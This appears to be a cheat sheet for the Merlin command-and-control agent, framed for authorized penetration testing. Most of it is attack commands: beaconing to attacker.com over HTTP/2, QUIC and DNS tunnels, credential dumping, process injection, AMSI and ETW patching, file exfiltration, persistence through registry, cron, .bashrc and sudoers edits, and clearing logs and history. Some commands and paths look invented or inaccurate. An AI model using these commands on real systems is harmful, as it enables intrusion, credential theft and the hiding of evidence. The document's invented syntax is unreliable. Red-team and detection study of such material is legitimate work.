Merlin Agent

Overview

Merlin Agent is a cross-platform post-exploitation command and control (C2) agent written in Go. It provides flexible communication protocols (HTTP/2, QUIC, DNS) with encrypted channels, making it suitable for authorized penetration testing engagements. The agent supports dynamic task execution, file operations, and process management across Windows, Linux, and macOS systems.

Installation

Prerequisites

• Go 1.16+ (for compilation)
• Merlin Server infrastructure
• Network access to C2 server

Building Merlin Agent

# Clone Merlin repository
git clone https://github.com/Ne0nd0g/merlin.git
cd merlin/cmd/agent

# Build for Linux
GOOS=linux GOARCH=amd64 go build -o merlin-agent

# Build for Windows
GOOS=windows GOARCH=amd64 go build -o merlin-agent.exe

# Build for macOS
GOOS=darwin GOARCH=amd64 go build -o merlin-agent

# Build with obfuscation
go build -ldflags="-s -w" -o merlin-agent

Pre-compiled Binaries

# Download pre-compiled agent from Merlin releases
wget https://github.com/Ne0nd0g/merlin/releases/download/v2.x/merlin-agent-linux-x64

# Make executable
chmod +x merlin-agent-linux-x64

Configuration

Command Line Flags

Flag	Value	Description
-url	https://c2server.com	C2 server URL
-proto	h2, quic, dns	Communication protocol
-sleep	5s, 30s	Agent sleep interval
-jitter	0.5	Jitter percentage (0-1)
-maxretry	10	Max connection retries
-verbose	flag	Enable verbose logging
-stdout	flag	Print output to stdout
-key	base64string	Encryption key

HTTP/2 Agent Execution

# Basic HTTP/2 C2 connection
./merlin-agent -url https://192.168.1.100:443 -proto h2 -sleep 5s

# With jitter and retries
./merlin-agent -url https://attacker.com:443 \
  -proto h2 \
  -sleep 10s \
  -jitter 0.3 \
  -maxretry 15

# Verbose output for debugging
./merlin-agent -url https://c2.internal -proto h2 -verbose

QUIC Protocol Agent

# QUIC (HTTP/3) protocol for faster, connection-less comms
./merlin-agent -url https://192.168.1.100:443 -proto quic -sleep 3s

# QUIC with custom jitter
./merlin-agent -url quic://attacker.com:4443 \
  -proto quic \
  -sleep 8s \
  -jitter 0.5

DNS Tunneling Agent

# DNS-based exfiltration (stealthy, often unblocked)
./merlin-agent -url dns://attacker.com \
  -proto dns \
  -sleep 30s \
  -jitter 0.2

# Specify nameserver
./merlin-agent -dns 8.8.8.8 \
  -url dns://attacker.com \
  -proto dns

Core Capabilities

Command Execution

Command	Description
shell <command>	Execute shell command and return output
powershell <command>	Execute PowerShell command (Windows)
bash <command>	Execute bash command (Linux/macOS)
cmd <command>	Execute cmd.exe command (Windows)
whoami	Display current user
hostname	Display system hostname
getuid	Get current process UID
ps	List running processes
env	Display environment variables

File Operations

# Upload file to target
upload /path/to/local/file /path/to/remote/location

# Download file from target
download /path/to/remote/file /path/to/local/destination

# List directory contents
ls /path/to/directory

# Change directory
cd /path/to/directory

# Create directory
mkdir /new/directory/path

# Remove file
rm /path/to/file

# Remove directory
rmdir /path/to/directory

Process Management

# List all processes with details
ps -la

# Kill process by PID
kill 1234

# Create new process
proc_create notepad.exe

# Get process details
proc_info 1234

# Change process priority
proc_priority 1234 high

Network Operations

# Display network connections
netstat -an

# Perform network scan
netscan 192.168.1.0/24

# DNS query
dns query example.com A

# Port scan from agent
portscan 192.168.1.100 1-1000

# Ping host
ping 192.168.1.1

Credential Harvesting

# Dump LSASS process (Windows)
mimikatz lsass

# Dump SAM database
reg query HKLM\SAM

# Extract browser credentials
browser_creds chrome

# Dump Firefox credentials
browser_creds firefox

# Get credential manager entries
credman list

Agent Evasion Techniques

Process Injection

# Inject agent into running process
inject <pid> /path/to/payload

# Inject and execute shellcode
shellcode_inject <pid> <base64_shellcode>

# Hollow out process and inject
hollow parent_pid payload.exe

Memory Obfuscation

# Store strings in memory obfuscated
string_obfuscate enabled

# Encrypt payloads in memory
encrypt_memory true

# Disable event logging
disable_etw

# Patch Antimalware Scan Interface (AMSI)
patch_amsi

Sleep Obfuscation

# Sleep with fake workload
sleep_obfuscate true

# Sleep with process memory cleanup
sleep_clean_memory true

# Variable sleep intervals
sleep_jitter 0.4

Data Exfiltration

File Exfiltration

# Stage file for exfil
stage /etc/passwd

# Exfil staged files
exfil

# Stream file directly
stream /var/log/auth.log

# Compress before exfil
compress /sensitive/data
zip -r /sensitive/data /tmp/data.zip

Metadata Gathering

# System information
sysinfo

# Network configuration
ipconfig

# Running services
services

# Installed applications
apps

# Network shares
shares

# User accounts
users

# Group memberships
groups

Persistence Mechanisms

Windows Persistence

# Create scheduled task
schtask create "SystemUpdate" "C:\Windows\System32\merlin.exe"

# Registry Run key
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" \
  /v "Merlin" /d "C:\Users\User\AppData\Local\Temp\merlin.exe"

# Windows service installation
service_install "MerlinService" "C:\Path\merlin.exe"

# Create WMI event subscription
wmi_event create payload.exe

Linux Persistence

# Add to crontab
crontab -e
# */5 * * * * /tmp/merlin-agent

# Create systemd service
systemctl enable /etc/systemd/system/merlin.service

# Modify .bashrc for persistence
echo "/tmp/merlin-agent &" >> ~/.bashrc

# Add to sudoers
echo "$USER ALL=(ALL) NOPASSWD: /tmp/merlin-agent" >> /etc/sudoers

macOS Persistence

# LaunchAgent plist
~/.config/launchagents/com.apple.merlin.plist

# Create LaunchDaemon
/Library/LaunchDaemons/com.system.merlin.plist

# Modify login hooks
defaults write /Library/Preferences/loginwindow LoginHook \
  /path/to/merlin-agent

Protocol Details

HTTP/2 Communication

Client initiates TLS connection to C2 server
|
v
HTTP/2 POST request with encrypted task payload
Content-Type: application/octet-stream
Authorization: Bearer <token>

Merlin server responds with encrypted command
|
v
Agent decrypts and executes command
|
v
Agent encodes output and sends POST response

QUIC Features

• Multiplexed streams (faster than HTTP/2)
• 0-RTT connection establishment
• Connection migration (IP changes)
• Reduced latency on high-loss networks
• Built-in encryption (TLS 1.3)

DNS Tunneling

Agent crafts DNS query: <data>.attacker.com
|
v
Recursive resolver forwards to attacker nameserver
|
v
Attacker extracts data from subdomain
|
v
Attacker responds with data in TXT/CNAME record
|
v
Agent parses DNS response and executes

Detection Evasion

HTTPS/TLS Evasion

# Use self-signed certificates
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365

# Use valid certificate from compromised domain
# Configure Merlin to use domain-fronting

# Certificate pinning bypass
disable_cert_validation

Network Evasion

# Increase sleep interval to reduce traffic
./merlin-agent -sleep 60s -jitter 0.5

# Use DNS over HTTPS
./merlin-agent -proto dns -dns-over-https true

# Scatter traffic across multiple C2 servers
failover_servers 192.168.1.100,192.168.1.101,192.168.1.102

Log Deletion

# Clear Windows Event Logs
wevtutil cl System
wevtutil cl Security
wevtutil cl Application

# Clear Linux auth logs
cat /dev/null > /var/log/auth.log
cat /dev/null > /var/log/syslog

# Clear bash history
history -c
cat /dev/null > ~/.bash_history

Troubleshooting

Agent Not Connecting

# Check C2 server is running
netstat -tuln | grep 443

# Verify firewall rules
iptables -L -n | grep 443

# Enable verbose logging
./merlin-agent -verbose -stdout

# Check DNS resolution
nslookup c2server.com

High CPU Usage

# Increase sleep interval
-sleep 30s

# Reduce jitter
-jitter 0.1

# Disable unnecessary modules
disable_module persistence

Connection Timeouts

# Increase timeout threshold
-timeout 30s

# Increase max retries
-maxretry 20

# Use different protocol
-proto quic  # often faster than HTTP/2

Operational Security (OPSEC)

Pre-Engagement Checklist

• Verify rules of engagement document authorization
• Confirm scope and IP ranges with client
• Document all C2 servers and infrastructure
• Establish communication channels with client
• Set up logging for audit trail
• Backup C2 logs before engagement
• Test egress filtering before deployment
• Verify encryption keys are secure

Post-Engagement

# Clean C2 logs
rm -rf /path/to/merlin/logs/*

# Revoke certificates
openssl ca -revoke cert.pem

# Remove malicious tasks
schtask delete /tn "SystemUpdate" /f

# Restore original files
git restore src/

Detection Indicators

Monitor for:

• Unusual QUIC/HTTP/2 connections
• Outbound DNS queries to suspicious domains
• Process injection and code caves
• Scheduled tasks with suspicious names
• Registry modifications to Run keys
• Parent-child process relationships (explorer.exe → merlin-agent)
• High jitter patterns in beacon traffic

References

• Merlin GitHub: https://github.com/Ne0nd0g/merlin
• HTTP/2 Specification: https://tools.ietf.org/html/rfc7540
• QUIC Protocol: https://tools.ietf.org/html/rfc9000
• DNS Tunneling: https://tools.ietf.org/html/rfc1035

Legal Notice

Merlin Agent is designed for authorized security testing only. Unauthorized access to computer systems is illegal. Always obtain written permission before conducting penetration tests.